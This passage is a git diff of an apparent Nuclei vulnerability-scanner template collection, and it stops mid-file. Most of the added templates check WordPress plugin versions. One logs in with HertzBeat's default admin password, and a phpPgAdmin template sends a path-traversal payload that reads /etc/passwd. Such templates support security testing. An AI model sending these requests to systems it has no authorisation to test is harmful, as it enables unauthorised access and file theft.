diff --git a/date.txt b/date.txt index 7036fab477..42eedaf32c 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240831 +20240901 diff --git a/poc.txt b/poc.txt index 686feab606..9a8a68cc29 100644 --- a/poc.txt +++ b/poc.txt @@ -2600,6 +2600,7 @@ ./poc/auth/dbeaver-credentials-6781.yaml ./poc/auth/dbeaver-credentials-6782.yaml ./poc/auth/dbeaver-credentials.yaml +./poc/auth/default-cred-hertzbeat.yaml ./poc/auth/dell-emc-ecom-default-credentials-6917.yaml ./poc/auth/dell-emc-ecom-default-credentials.yaml ./poc/auth/dell-idrac-default-login-6942.yaml @@ -21643,6 +21644,7 @@ ./poc/cve/CVE-2022-4099-efabe65e0636127b900f654341e2d21b.yaml ./poc/cve/CVE-2022-4099.yaml ./poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml +./poc/cve/CVE-2022-4100.yaml ./poc/cve/CVE-2022-4101-ff9c428babf09501938ec8b47a7ff0b5.yaml ./poc/cve/CVE-2022-4101.yaml ./poc/cve/CVE-2022-4102-211a125e03141593ca6a2a03eab40ec0.yaml @@ -22365,6 +22367,7 @@ ./poc/cve/CVE-2022-45359-b36586431dff2aad1fae7b081e9eb505.yaml ./poc/cve/CVE-2022-45359.yaml ./poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml +./poc/cve/CVE-2022-4536.yaml ./poc/cve/CVE-2022-45360-207ef17540c22dd0793408d606b91bda.yaml ./poc/cve/CVE-2022-45360.yaml ./poc/cve/CVE-2022-45361-aa79324e8a1a2b2db7d009a7aa76d972.yaml @@ -22404,6 +22407,7 @@ ./poc/cve/CVE-2022-45377-f99be6f5db095fa34ac8836d9c3bf756.yaml ./poc/cve/CVE-2022-45377.yaml ./poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml +./poc/cve/CVE-2022-4539.yaml ./poc/cve/CVE-2022-4542-f62d4c5bcf581eb4208970f7bf92c622.yaml ./poc/cve/CVE-2022-4542.yaml ./poc/cve/CVE-2022-4544-4a43b5c1e9b5ac07f83a1ad6288e2487.yaml @@ -39501,6 +39505,7 @@ ./poc/cve/CVE-2024-3885-9e0a7124350833ada45c8c2089abea17.yaml ./poc/cve/CVE-2024-3885.yaml ./poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml +./poc/cve/CVE-2024-3886.yaml ./poc/cve/CVE-2024-3887-c69a35937d64f9aabf71399960d846ed.yaml ./poc/cve/CVE-2024-3887.yaml ./poc/cve/CVE-2024-3888-73a7dff9e7fc032d9c7b3504d9e32105.yaml @@ -40923,6 +40928,7 @@ ./poc/cve/CVE-2024-5039.yaml ./poc/cve/CVE-2024-5041-683fbe7656aac22ccbf1456af0532a73.yaml ./poc/cve/CVE-2024-5041.yaml +./poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml ./poc/cve/CVE-2024-5057-b5cd1f63e71feb762d09590f74da1942.yaml ./poc/cve/CVE-2024-5057.yaml ./poc/cve/CVE-2024-5058-63a03ea4af4d1f6d04449e3cd1d991f1.yaml @@ -41022,6 +41028,7 @@ ./poc/cve/CVE-2024-5207-dfe92838983c441ca6954031b5866f4e.yaml ./poc/cve/CVE-2024-5207.yaml ./poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml +./poc/cve/CVE-2024-5212.yaml ./poc/cve/CVE-2024-5215-0170d5acc9b537b31bb3fad32634325d.yaml ./poc/cve/CVE-2024-5215.yaml ./poc/cve/CVE-2024-5217.yaml @@ -42166,6 +42173,7 @@ ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml ./poc/cve/CVE-2024-7422.yaml ./poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml +./poc/cve/CVE-2024-7435.yaml ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml ./poc/cve/CVE-2024-7447.yaml ./poc/cve/CVE-2024-7484-5be14b55ae30eebe36f1e5fcad1d160a.yaml @@ -42242,6 +42250,7 @@ ./poc/cve/CVE-2024-7703-7d232ae776193850ef9d74eec7d98698.yaml ./poc/cve/CVE-2024-7703.yaml ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml +./poc/cve/CVE-2024-7717.yaml ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml ./poc/cve/CVE-2024-7775.yaml ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml @@ -42315,6 +42324,7 @@ ./poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml ./poc/cve/CVE-2024-8091.yaml ./poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml +./poc/cve/CVE-2024-8108.yaml ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml ./poc/cve/CVE-2024-8120.yaml ./poc/cve/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml @@ -42330,6 +42340,7 @@ ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml ./poc/cve/CVE-2024-8274.yaml ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml +./poc/cve/CVE-2024-8276.yaml ./poc/cve/CVE-2024-8319-f52695adcae621062e419e0168d0ec9c.yaml ./poc/cve/CVE-2024-8319.yaml ./poc/cve/CVE_2023_49442.yaml @@ -50308,6 +50319,7 @@ ./poc/default/default-config-6835.yaml ./poc/default/default-config-6836.yaml ./poc/default/default-config.yaml +./poc/default/default-cred-hertzbeat.yaml ./poc/default/default-detect-generic-6837.yaml ./poc/default/default-detect-generic-6838.yaml ./poc/default/default-detect-generic-6839.yaml @@ -64212,6 +64224,7 @@ ./poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml ./poc/other/attire-blocks-4d0bda665c71d62ec3979730095585b3.yaml ./poc/other/attire-blocks.yaml +./poc/other/attire.yaml ./poc/other/attorney-75ae42f95c5029a5c34276ce81634c4d.yaml ./poc/other/attorney-9c2d3a40daf25f855f3ce9f2c18eba21.yaml ./poc/other/attorney.yaml @@ -73143,6 +73156,7 @@ ./poc/other/fluent-security-2950b8c12fea2a10540f20704f5aa9d1.yaml ./poc/other/fluent-security.yaml ./poc/other/fluent-support.yaml +./poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml ./poc/other/fluentform-1a2efa41a2d05e264321477edc4bb700.yaml ./poc/other/fluentform-359dafd9ea2acf47f5a3f1c1b3277d92.yaml ./poc/other/fluentform-42675b86d66431173f7276d369b78de4.yaml @@ -114674,6 +114688,7 @@ ./poc/wordpress/wp-events-939c8e41990e721256330f6828258871.yaml ./poc/wordpress/wp-events-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml +./poc/wordpress/wp-events-manager.yaml ./poc/wordpress/wp-events-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-events-plugin.yaml ./poc/wordpress/wp-events.yaml diff --git a/poc/auth/default-cred-hertzbeat.yaml b/poc/auth/default-cred-hertzbeat.yaml new file mode 100644 index 0000000000..c332a19d4d --- /dev/null +++ b/poc/auth/default-cred-hertzbeat.yaml @@ -0,0 +1,33 @@ +id: apache-hertzbeat-default-login + +info: + name: Apache HertzBeat Default Credentials + author: securitytaters + severity: high + description: Apache HertzBeat enables default admin credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/hertzbeat?tab=readme-ov-file#1install-quickly-via-docker + tags: hertzbeat,default-login + +variables: + username: admin + password: hertzbeat + +http: + - raw: + - |- + POST /api/account/auth/form HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":0,"identifier":"{{username}}","credential":"{{password}}"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"token":"eyJ' + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2022-4100.yaml b/poc/cve/CVE-2022-4100.yaml new file mode 100644 index 0000000000..694c56c6e8 --- /dev/null +++ b/poc/cve/CVE-2022-4100.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-4100 + +info: + name: > + WP Cerber Security <= 9.4 - IP Protection Bypass + author: topscoder + severity: medium + description: > + The WP Cerber Security plugin for WordPress is vulnerable to IP Protection bypass in versions up to, and including 9.4 due to the plugin improperly checking for a visitor's IP address. This makes it possible for an attacker whose IP address has been blocked to bypass this control by setting the X-Forwarded-For: HTTP header to an IP Address that hasn't been blocked. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4100 + metadata: + fofa-query: "wp-content/plugins/wp-cerber/" + google-query: inurl:"/wp-content/plugins/wp-cerber/" + shodan-query: 'vuln:CVE-2022-4100' + tags: cve,wordpress,wp-plugin,wp-cerber,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-cerber/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-cerber" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.4') \ No newline at end of file diff --git a/poc/cve/CVE-2022-4536.yaml b/poc/cve/CVE-2022-4536.yaml new file mode 100644 index 0000000000..8115625b5d --- /dev/null +++ b/poc/cve/CVE-2022-4536.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-4536 + +info: + name: > + IP Vault – WP Firewall <= 1.1 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: medium + description: > + The IP Vault – WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66e89753-f83e-4e60-b165-6d3d101d6c59?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4536 + metadata: + fofa-query: "wp-content/plugins/ip-vault-wp-firewall/" + google-query: inurl:"/wp-content/plugins/ip-vault-wp-firewall/" + shodan-query: 'vuln:CVE-2022-4536' + tags: cve,wordpress,wp-plugin,ip-vault-wp-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-vault-wp-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-vault-wp-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2022-4539.yaml b/poc/cve/CVE-2022-4539.yaml new file mode 100644 index 0000000000..176a980d1b --- /dev/null +++ b/poc/cve/CVE-2022-4539.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-4539 + +info: + name: > + Web Application Firewall <= 2.1.2 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: medium + description: > + The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e99531c-8742-4f91-8525-65bb3cb06644?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4539 + metadata: + fofa-query: "wp-content/plugins/web-application-firewall/" + google-query: inurl:"/wp-content/plugins/web-application-firewall/" + shodan-query: 'vuln:CVE-2022-4539' + tags: cve,wordpress,wp-plugin,web-application-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/web-application-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "web-application-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3886.yaml b/poc/cve/CVE-2024-3886.yaml new file mode 100644 index 0000000000..f819944536 --- /dev/null +++ b/poc/cve/CVE-2024-3886.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3886 + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_check_envato_code function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-3886 + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:CVE-2024-3886' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml b/poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml new file mode 100644 index 0000000000..e37b8d91ae --- /dev/null +++ b/poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.18 - Missing Authorization to Authenticated (Subscriber+) Mailchimp Integration Modification + author: topscoder + severity: low + description: > + The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized Malichimp API key update due to an insufficient capability check on the verifyRequest function in all versions up to, and including, 5.1.18. This makes it possible for Form Managers with a Subscriber-level access and above to modify the Mailchimp API key used for integration. At the same time, missing Mailchimp API key validation allows the redirect of the integration requests to the attacker-controlled server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 4.2 + cve-id: CVE-2024-5053 + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:CVE-2024-5053' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.18') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5212.yaml b/poc/cve/CVE-2024-5212.yaml new file mode 100644 index 0000000000..5e3a0e5e7b --- /dev/null +++ b/poc/cve/CVE-2024-5212.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5212 + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db95415a-5354-498b-8368-58c47d9948de?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-5212 + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:CVE-2024-5212' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7435.yaml b/poc/cve/CVE-2024-7435.yaml new file mode 100644 index 0000000000..f94424cd5d --- /dev/null +++ b/poc/cve/CVE-2024-7435.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7435 + +info: + name: > + Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Attire theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.6 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7435 + metadata: + fofa-query: "wp-content/themes/attire/" + google-query: inurl:"/wp-content/themes/attire/" + shodan-query: 'vuln:CVE-2024-7435' + tags: cve,wordpress,wp-theme,attire,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/attire/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "attire" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7717.yaml b/poc/cve/CVE-2024-7717.yaml new file mode 100644 index 0000000000..1d2a396e1c --- /dev/null +++ b/poc/cve/CVE-2024-7717.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7717 + +info: + name: > + WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + The WP Events Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter in all versions up to, and including, 2.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7717 + metadata: + fofa-query: "wp-content/plugins/wp-events-manager/" + google-query: inurl:"/wp-content/plugins/wp-events-manager/" + shodan-query: 'vuln:CVE-2024-7717' + tags: cve,wordpress,wp-plugin,wp-events-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-events-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8108.yaml b/poc/cve/CVE-2024-8108.yaml new file mode 100644 index 0000000000..80547d4de2 --- /dev/null +++ b/poc/cve/CVE-2024-8108.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8108 + +info: + name: > + Share This Image <= 2.01 - Authenticated (Contributor+) Stored Cross-Site Scripting via alignment Parameter + author: topscoder + severity: low + description: > + The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alignment' parameter in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8108 + metadata: + fofa-query: "wp-content/plugins/share-this-image/" + google-query: inurl:"/wp-content/plugins/share-this-image/" + shodan-query: 'vuln:CVE-2024-8108' + tags: cve,wordpress,wp-plugin,share-this-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/share-this-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "share-this-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.01') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8276.yaml b/poc/cve/CVE-2024-8276.yaml new file mode 100644 index 0000000000..80bc70f361 --- /dev/null +++ b/poc/cve/CVE-2024-8276.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8276 + +info: + name: > + WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The WPZOOM Portfolio Lite – Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘align’ attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8276 + metadata: + fofa-query: "wp-content/plugins/wpzoom-portfolio/" + google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/" + shodan-query: 'vuln:CVE-2024-8276' + tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpzoom-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index fda684a006..e714f96cca 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml @@ -1,28 +1,27 @@ id: CVE-2008-5587 + info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - classification: - cve-id: CVE-2008-5587 + reference: https://www.exploit-db.com/exploits/7363 + metadata: - shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2008,lfi,phppgadmin + shodan-query: 'http.title:"phpPgAdmin"' + description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." + requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 668fd715ec..0cf11fcf80 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,10 +1,9 @@ id: CVE-2016-6210 - info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - + tags: cve,cve2016,network,openssh description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -16,18 +15,15 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' diff --git a/poc/cve/cve-2018-15535.yaml b/poc/cve/cve-2018-15535.yaml index ed7aa501ed..a4fa48f002 100644 --- a/poc/cve/cve-2018-15535.yaml +++ b/poc/cve/cve-2018-15535.yaml @@ -1,31 +1,32 @@ id: CVE-2018-15535 + info: - name: Responsive FileManager <9.13.4 - Local File Inclusion + name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo severity: high - description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. + description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 - - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 - - http://seclists.org/fulldisclosure/2018/Aug/34 - - https://www.exploit-db.com/exploits/45271/ + - 